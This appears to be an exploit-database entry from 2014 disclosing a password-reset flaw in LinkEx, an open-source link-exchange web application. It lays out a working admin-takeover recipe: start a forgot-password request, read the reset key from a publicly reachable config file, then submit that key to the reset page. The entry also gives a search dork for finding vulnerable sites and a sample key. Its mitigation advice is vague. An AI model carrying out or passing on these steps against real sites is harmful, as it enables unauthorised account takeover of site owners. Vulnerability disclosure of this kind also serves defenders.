LinEx All Versions Password Reset Vulnerability

vendor:

LinkEx

by:

N B Sri Harsha

7,5

CVSS

HIGH

Password Reset Vulnerability

255

CWE

Product Name: LinkEx

Affected Version From: All Versions

Affected Version To: All Versions

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2014

LinEx All Versions Password Reset Vulnerability

LinkEx is a open source web application for exchanging link, which most of the porn sites uses it. First, go to the website http://site.com/linkex/?page=admin and click on forgot password and enter the captcha. Then, go to site.com/linkex/data/config/config and note down the 'key' parameter. Finally, use the key at site.com/linkex/?page=resetpassword&key=[key] to reset the password.

Mitigation:

Ensure that the website is secure and that the passwords are encrypted.

Source

Exploit-DB raw data:

# Exploit Title: LinEx All Versions Password Reset Vulnerability
# Google Dork:  linkex.dk 2006-2011
# Date: 15/01/2014
# Exploit Author: N B Sri Harsha ( Reconnect Gray hat )
# Vendor Homepage: http://linkex.dk/
# Software Link: http://linkex.dk/releases/linkex.20120508.zip
# Version: All Versions


LinkEx Is A Open Source Web Application For Exchanging link ,  Which Most
Of The Porn Sites Uses it ,

1) First GO Here http://site.com/linkex/?page=admin
2) Click On Forgot password and enter the captcha
3) Go Here >> site.com/linkex/data/config/config
Note down the " key " parameter
ie :- "key";s:32:"36d1dd98c84e643236216449e96bed0d"
4) Now Use the Key Here >> site.com/linkex/?page=resetpassword&key=[key]
5) Thats It U Will Asked For New Username And Password


Shouts to :-  | ROHIT ROY | GRAY CODE | Moni HBH | Yamraaj | HALK | Le3to |
HaXarwOw | COSMO | 404 !-!@!2$!-!@ | Root Breaker | N3O | Godhacker |
3QUIVOR | Dmostwanted | r00t.hc0n | hun73r_ihos |

-- 
Regards
N B Sri Harsha